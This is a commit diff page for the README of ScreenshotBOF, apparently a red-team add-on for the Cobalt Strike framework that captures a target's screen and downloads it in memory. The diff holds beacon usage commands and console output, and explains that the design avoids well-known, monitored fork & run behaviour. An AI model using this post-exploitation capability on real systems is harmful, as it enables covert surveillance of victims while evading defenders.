crash.software
Projects
Pull Requests
Issues
Builds
ScreenshotBOF
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ScreenshotBOF Commits 7e0ee92c
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # ScreenshotBOF
    2 2   
    3  -An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
     3 +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
    4 4   
    5 5  ## Self Compilation
    6 6  1. git clone the repo
    skipped 2 lines
    9 9   
    10 10  ## Usage
    11 11  1. import the screenshotBOF.cna script into Cobalt Strike
    12  -2. use the command screenshot_bof
    13  -3. Download the screenshot from the target
     12 +2. use the command screenshot_bof {local filename}
    14 13  ```
    15  -beacon> screenshot_bof
     14 +beacon> screenshot_bof sad.bmp
    16 15  [*] Running screenshot BOF by (@codex_tf2)
    17  -[+] host called home, sent: 3411 bytes
     16 +[+] host called home, sent: 4860 bytes
    18 17  [+] received output:
    19  -[*] Tasked beacon to printscreen and save to disk
     18 +[*] Tasked beacon to printscreen and save to sad.bmp
    20 19  [+] received output:
    21 20  [+] PrintScreen saved to bitmap...
    22  -[+] received output:
    23  -[+] Printscreen bitmap saved to screenshot.bmp
    24  -beacon> download screenshot.bmp
    25  -[*] Tasked beacon to download screenshot.bmp
    26  -[+] host called home, sent: 22 bytes
    27  -[*] started download of C:\screenshot.bmp (12441668 bytes)
    28  -[*] download of screenshot.bmp is complete
     21 +[*] started download of sad.bmp
    29 22  ```
    30 23   
    31 24  ## Notes
    32 25  - no evasion is performed, which should be fine since the WinAPIs used are not malicious
    33  -- in memory downloading of screenshots is planned to be added
    34  -- the filename can be changed in the source code.
    35 26   
    36 27  ## Why did I make this?
    37 28  Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
    skipped 1 lines
    39 30  ## Credits
    40 31  - Made using https://github.com/securifybv/Visual-Studio-BOF-template
    41 32  - Save BMP to file from https://stackoverflow.com/a/60667564
     33 +- in memory download from https://github.com/anthemtotheego/CredBandit
Please wait...
Page is in error, reload to recover